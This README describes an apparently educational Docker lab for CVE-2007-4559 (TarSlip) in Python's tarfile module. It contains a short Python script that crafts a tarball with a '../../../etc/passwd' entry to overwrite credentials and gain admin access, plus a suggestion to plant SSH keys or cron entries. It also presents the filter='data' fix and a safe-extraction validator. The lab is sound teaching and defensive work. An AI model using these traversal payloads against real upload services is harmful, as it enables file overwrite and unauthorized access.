# CVE-2007-4559 (TarSlip): The 15-Year Directory Traversal
> **Educational use only.** This lab intentionally exploits file system vulnerabilities inside isolated Docker containers. Do not run on any system with sensitive data or in production environments.
A self-contained Docker lab that demonstrates **CVE-2007-4559**, the infamous "TarSlip" vulnerability in Python's `tarfile` module, through a concrete, end-to-end attack chain:
1. An attacker uploads a crafted tarball to a file upload API.
2. `extractall()` blindly writes a tar entry named `../../../etc/passwd` outside the extraction directory, overwriting the real system file.
3. The planted password grants the attacker access to a protected `/admin` endpoint.
4. The same attack is then run against a fixed API, where one line of code blocks it.
---
## The vulnerability
Python's `tarfile.extractall()` faithfully reproduces every entry in a tar archive, including entries whose names contain `../` path traversal sequences. It was **never designed to be a security boundary**.
```
tar entry name : ../../../etc/passwd
extraction dir : /shared/uploads/a1b2c3d4/
resolved path  : /shared/uploads/a1b2c3d4/../../../etc/passwd
               = /etc/passwd   ← system file overwritten
```
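The resolution step is plain path arithmetic. The sketch below reproduces it with `posixpath`; it is a lexical model only (it ignores symlinks, which `os.path.realpath` would follow), and `resolve_entry` is a hypothetical helper, not part of the lab:

```python
import posixpath

def resolve_entry(extraction_dir: str, entry_name: str) -> str:
    """Lexically resolve where a tar entry would land (POSIX paths, symlinks ignored)."""
    return posixpath.normpath(posixpath.join(extraction_dir, entry_name))

# Each "../" climbs one level: a1b2c3d4 -> uploads -> shared -> /
print(resolve_entry("/shared/uploads/a1b2c3d4/", "../../../etc/passwd"))

# Surplus "../" segments cannot overshoot: ".." at the root stays at the root
print(resolve_entry("/shared/uploads/a1b2c3d4/", "../../../../../etc/passwd"))
```

Both calls print `/etc/passwd`. Because extra `../` segments are harmless at the root, an attacker does not need to know the exact depth of the extraction directory; padding the name with a few more is enough.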
| Year | Event |
|---|---|
| **2007** | Bug reported to the Python security team |
| **2007-2022** | Marked "not a security issue": tarfile is "working as intended" |
| **2022** | Trellix researchers scan GitHub and estimate that **350,000+ repos** call `extractall()` on untrusted input |
| **2022** | Public disclosure. CVE-2007-4559 resurfaces. Industry-wide scramble. |
| **2023** | PEP 706 ships `filter='data'` in Python 3.12 (and in backported security releases such as 3.11.4): the fix is a single argument |
---
## What the demo shows
The demo runs in three beats, each requiring a keypress to advance.
### Beat 1 โ Baseline
- `GET /admin` returns **401**. The admin endpoint exists and is protected. The attacker does not know the password.
- Upload `innocent.tar.gz`: files land inside the sandbox directory. Everything looks normal.
### Beat 2 โ The Exploit
```
Attacker crafts tarslip_passwd.tar.gz
  └─ entry:   "../../../etc/passwd"
     content: admin:hacked:1001:...   ← planted password
        │
        ▼
POST /upload   (multipart file upload)
        │
        ▼
extractall("/shared/uploads/{uuid}/")
  resolves "../../../etc/passwd" → /etc/passwd   ← CVE-2007-4559
        │
        ▼
GET /admin   Authorization: Basic admin:hacked
        │
        ▼
HTTP 200: "Welcome, admin! You have full admin access."
flag: CVE-2007-4559{tarslip_passwd_overwrite_to_admin_rce}
```
One HTTP POST. No shell. No RCE payload. Just a tar file.
### Beat 3 โ The Fix
The same tarball is uploaded to the fixed API, which passes `filter='data'` to `extractall()`. Python raises `tarfile.OutsideDestinationError`: the traversal is blocked, `/etc/passwd` is untouched, and `/admin` stays locked.
```python
# Vulnerable: no filter (the default behavior before Python 3.14)
tar.extractall(extraction_dir)
# Fixed: PEP 706 (Python 3.12+, and backported releases such as 3.11.4+)
tar.extractall(extraction_dir, filter='data')
```
One argument. More than fifteen years to ship.
---
## Architecture
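Four services on an isolated Docker bridge network (`tarslip-net`). Nothing reaches the internet. Because `vulnerable-api` and `fixed-api` share port 8000, only one of them runs at a time; the diagram shows the vulnerable stack.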
```
┌──────────────────────────────────────────────────────────────┐
│ tarslip-net (bridge)                                         │
│                                                              │
│  ┌──────────────────┐        ┌───────────────────────────┐   │
│  │ vulnerable-api   │        │ file-server               │   │
│  │ python:3.11.3    │        │ nginx:alpine              │   │
│  │ port 8000        │        │ port 8080 (host)          │   │
│  │                  │        │                           │   │
│  │ POST /upload     │        │ Serves /shared over HTTP  │   │
│  │ GET /admin       │        │ to browse extracts        │   │
│  │ GET /health      │        │ visually                  │   │
│  └────────┬─────────┘        └─────────────┬─────────────┘   │
│           │     shared-storage volume      │                 │
│           └────────────────────────────────┘                 │
│                                                              │
│  ┌──────────────────────┐                                    │
│  │ attacker             │                                    │
│  │ python:3.12          │  (no host port; internal only)     │
│  │                      │                                    │
│  │ craft_malicious.py   │  generates tarballs                │
│  │ demo.py              │  drives the demo                   │
│  └──────────────────────┘                                    │
└──────────────────────────────────────────────────────────────┘
```
| Service | Image | Role | Host port |
|---|---|---|---|
| `vulnerable-api` | `python:3.11.3-slim` | Flask upload API + `/admin` guarded by `/etc/passwd` auth | 8000 |
| `fixed-api` | `python:3.12-slim` | Same code + `USE_SAFE_EXTRACTION=true` | 8000 |
| `file-server` | `nginx:alpine` | Directory listing of extracted files | 8080 |
| `attacker` | `python:3.12-slim` | Payload generator + demo driver | none |
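The vulnerable and fixed APIs use **identical source code**. Apart from the base image (`python:3.11.3-slim` predates the PEP 706 backport, while `python:3.12-slim` ships the `filter` argument natively), the only difference is the `USE_SAFE_EXTRACTION=true` environment variable on the fixed container, which flips the single `filter='data'` argument.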
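The lab's `app.py` is not reproduced here, so the following is only a sketch of how one environment variable can flip the argument. `extraction_kwargs` and `extract_upload` are hypothetical names, and treating the case-insensitive string `"true"` as "on" is an assumption about how the flag is parsed.

```python
import os
import tarfile
from collections.abc import Mapping

def extraction_kwargs(environ: Mapping[str, str] = os.environ) -> dict:
    """Return extra extractall() arguments based on USE_SAFE_EXTRACTION (assumed parsing)."""
    if environ.get("USE_SAFE_EXTRACTION", "false").strip().lower() == "true":
        return {"filter": "data"}  # PEP 706: reject traversal, unsafe links, devices
    return {}                       # legacy call: member names are trusted

def extract_upload(archive_path: str, dest: str) -> None:
    """Hypothetical upload handler body: the same code path in both containers."""
    with tarfile.open(archive_path) as tar:
        tar.extractall(dest, **extraction_kwargs())
```

The empty-kwargs branch only reproduces the bug on interpreters where "no filter" is the default: Python 3.12 and 3.13 emit a `DeprecationWarning` for it, and from Python 3.14 the default filter is `'data'`, so a deliberately vulnerable build on 3.14+ would have to pass `filter='fully_trusted'` explicitly.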
---
## Repository layout
```
CVE-2007-4559-lab/
├── run_demo.sh                      # start here
├── docker-compose.vulnerable.yml
├── docker-compose.fixed.yml
├── vulnerable-api/
│   ├── app.py                       # Flask API: /upload + /admin + /health
│   ├── Dockerfile                   # seeds admin:s3cr3t_Adm1nPass into /etc/passwd
│   └── requirements.txt
├── file-server/
│   ├── Dockerfile
│   └── nginx.conf
└── attacker/
    ├── craft_malicious.py           # generates innocent.tar.gz + tarslip_passwd.tar.gz
    ├── demo.py                      # four-mode CLI driver (craft/baseline/exploit/verify)
    ├── Dockerfile
    └── requirements.txt
```
---
## Prerequisites
- **Docker** 20.10+ with the Compose plugin (`docker compose version`)
- **macOS / Linux**: the shell script uses `bash`
- Ports **8000** and **8080** free on your host
---
## Running the demo
```bash
git clone https://github.com/your-username/CVE-2007-4559-lab.git
cd CVE-2007-4559-lab
bash run_demo.sh
```
The script is fully interactive. It prints a narrative before each step and waits for **Enter** to advance. No prior Docker knowledge is needed to follow along.
### What each pause point covers
| Pause | Narrative shown | Action on Enter |
|---|---|---|
| 1 | CVE timeline, what the three beats are | Build vulnerable stack |
| 2 | Container roles, seeded admin password | Generate payloads |
| 3 | What's inside each tarball | Beat 1: baseline |
| 4 | Why `/admin` is 401, what normal extraction looks like | Beat 2: exploit |
| 5 | The exact traversal math, what gets overwritten | Swap to fixed stack |
| 6 | What `filter='data'` does and why it works | Beat 3: verify |
| 7 | Key takeaways + broader ZipSlip pattern | Teardown |
### Running beats individually
If you want to step through manually:
```bash
# Vulnerable stack
docker compose -f docker-compose.vulnerable.yml up --build -d
docker compose -f docker-compose.vulnerable.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py baseline
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py exploit
# Fixed stack
docker compose -f docker-compose.vulnerable.yml down
docker compose -f docker-compose.fixed.yml up --build -d
docker compose -f docker-compose.fixed.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.fixed.yml exec attacker python demo.py verify
# Teardown
docker compose -f docker-compose.fixed.yml down
```
### Visual inspection
While the vulnerable stack is running, open [http://localhost:8080/uploads/](http://localhost:8080/uploads/) to browse the extracted session directories in your browser.
---
## How the `/admin` endpoint works
The API seeds a secret admin password into `/etc/passwd` at image build time:
```
admin:s3cr3t_Adm1nPass:1001:1001:Administrator:/home/admin:/bin/bash
```
`GET /admin` reads this file and checks the second field (the password) against the HTTP Basic Auth credentials. The attacker doesn't know `s3cr3t_Adm1nPass`, but after TarSlip overwrites the file with their own version containing `admin:hacked`, they do.
This is a simplified model of real-world targets: SSH `authorized_keys`, application config files, cron jobs, and any credential file the web process can write. (On a real Linux host, `/etc/passwd` holds an `x` placeholder and password hashes live in `/etc/shadow`; the plaintext password field here is a deliberate simplification.)
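The check described above fits in a few lines. This is a hypothetical reconstruction, not the lab's actual `app.py`: `admin_auth_ok`, `password_field`, and the parsing rules (first line whose first field is `admin`, password in field two) are assumptions based on the description.

```python
import base64
import binascii
import hmac
from typing import Optional

def password_field(passwd_text: str, user: str) -> Optional[str]:
    """Return the second colon-separated field for `user` (the lab's password slot)."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] == user:
            return fields[1]
    return None

def admin_auth_ok(authorization: str, passwd_text: str) -> bool:
    """Validate an HTTP Basic 'Authorization' header against the admin entry."""
    scheme, _, encoded = authorization.partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        decoded = base64.b64decode(encoded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return False
    user, _, password = decoded.partition(":")
    expected = password_field(passwd_text, "admin")
    if user != "admin" or expected is None:
        return False
    # Constant-time comparison on bytes (str inputs would have to be ASCII-only)
    return hmac.compare_digest(password.encode(), expected.encode())
```

Whatever the file says is the truth for this check, which is exactly why overwriting the file hands the attacker the credential.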
---
## How the payloads are crafted
`craft_malicious.py` uses Python's own `tarfile` module, the same one that has the bug:
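```python
import io
import tarfile

def _add_entry(tar, name, content):
    info = tarfile.TarInfo(name=name)  # name is the traversal path, stored verbatim
    info.size = len(content)
    tar.addfile(info, io.BytesIO(content))

# Illustrative stand-in mirroring the seeded line format; the lab's exact payload may differ
malicious_passwd_content = b"admin:hacked:1001:1001:Administrator:/home/admin:/bin/bash\n"
with tarfile.open("tarslip_passwd.tar.gz", "w:gz") as tar:
    # Entry name resolves to /etc/passwd when extracted into /shared/uploads/{uuid}/
    _add_entry(tar, "../../../etc/passwd", malicious_passwd_content)
```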
No special tools. No binary exploitation. The standard library is both the weapon and the victim.
---
## The fix explained
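Python 3.12 introduced the `filter=` argument in PEP 706, and it was backported to security releases of earlier versions (for example 3.11.4). The `'data'` filter:
- Rejects entries that resolve outside the destination directory, raising `tarfile.OutsideDestinationError`
- Strips leading `/` from member names, so absolute paths land inside the destination
- Clears setuid/setgid/sticky bits and group/other write permissions
- Refuses device files and pipes, and links (symbolic or hard) that point to absolute paths or outside the destination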
```python
# Before (vulnerable: still the default until Python 3.14)
with tarfile.open(path) as tar:
tar.extractall(dest)
# After (safe)
with tarfile.open(path) as tar:
tar.extractall(dest, filter='data')
```
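For interpreters without the `filter` argument (anything before 3.12 that predates the PEP 706 backports, such as the 3.11.3 used in the vulnerable container), validate manually: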
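```python
import os
import tarfile

def safe_extract(tar: tarfile.TarFile, dest: str) -> None:
    """Extract `tar` into `dest`, refusing members that could land outside it."""
    dest = os.path.realpath(dest)
    for member in tar.getmembers():
        # realpath() cannot see links that earlier members would create, so a
        # symlink/hardlink member could redirect later writes; refuse them outright.
        if member.issym() or member.islnk():
            raise ValueError(f"Refusing link member: {member.name}")
        member_path = os.path.realpath(os.path.join(dest, member.name))
        # commonpath() also accepts dest itself (e.g. a "./" entry),
        # which a plain startswith(dest + os.sep) test would reject.
        if os.path.commonpath([dest, member_path]) != dest:
            raise ValueError(f"Unsafe path: {member.name}")
    tar.extractall(dest)
```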
Static analysis: `bandit` rule **B202** flags unsafe `extractall()` calls in CI.
---
## Broader impact โ ZipSlip
TarSlip is the tar-archive form of a vulnerability class, usually called ZipSlip after Snyk's 2018 disclosure, that appears wherever code extracts archives without validating entry paths:
| Language | Commonly misused API | CVE / Advisory |
|---|---|---|
| Python | `tarfile.extractall()` | CVE-2007-4559 |
| Java | `ZipInputStream` | ZipSlip (2018) |
| Go | `archive/zip` | ZipSlip (2018) |
| .NET | `ZipArchive` | ZipSlip (2018) |
| Node.js | `tar`, `adm-zip`, others | ZipSlip (2018) |
Same root cause everywhere: trusting paths from untrusted archives. Same fix everywhere: canonicalize and validate before writing.
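The same canonicalize-and-validate step applies wherever code writes archive entries itself, which is the pattern behind most ZipSlip bugs. Below is a sketch using Python's `zipfile` with a hand-written extraction loop. Note that `ZipFile.extractall()` already sanitizes member names; `is_inside` and `extract_zip_manually` are hypothetical helpers.

```python
import os
import shutil
import zipfile

def is_inside(dest: str, entry_name: str) -> bool:
    """Canonicalize dest/entry_name and check that it stays under dest."""
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, entry_name))
    return os.path.commonpath([root, target]) == root

def extract_zip_manually(zip_path: str, dest: str) -> None:
    """Write each entry by hand, validating its path before any bytes hit disk."""
    root = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if not is_inside(root, info.filename):
                raise ValueError(f"ZipSlip attempt: {info.filename!r}")
            target = os.path.realpath(os.path.join(root, info.filename))
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                shutil.copyfileobj(src, dst)
```

Absolute entry names are caught by the same check, because `os.path.join` discards `root` when the second argument is absolute.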
---
## Audience variations
### Developer audiences
Focus on the before/after code diff and the `bandit` B202 rule. The goal is to answer "how do we prevent this in our codebase?" by showing the PEP 706 migration guide and how to add the check to CI.
### Security audiences
Focus on the Trellix disclosure methodology โ how they searched GitHub at scale, estimated impact across 350,000 repos, and navigated responsible disclosure for a vulnerability this widespread.
### CTF audiences
Extend `craft_malicious.py` to plant an SSH `authorized_keys` file or a malicious cron entry instead of `/etc/passwd`. Same technique, different targets โ shows that any writable path is an attack surface.
---
## References
- [NVD: CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559)
- [PEP 706: Filter for tarfile.extractall](https://peps.python.org/pep-0706/)
- [Trellix: "15 Years Later: On the Dangers of Zip/Tar Slip"](https://www.trellix.com/en-us/about/newsroom/stories/research/tarslip.html)
- [Python issue tracker: bpo-21109](https://bugs.python.org/issue21109) (the long-running tarfile traversal issue, opened in 2014)
- [Bandit B202](https://bandit.readthedocs.io/en/latest/plugins/b202_tarfile_unsafe_members.html)
- [Snyk ZipSlip advisory](https://security.snyk.io/research/zip-slip-vulnerability)
---
## License
MIT โ use freely for education, security research, and conference demos. Do not use the payload generation techniques against systems you do not own.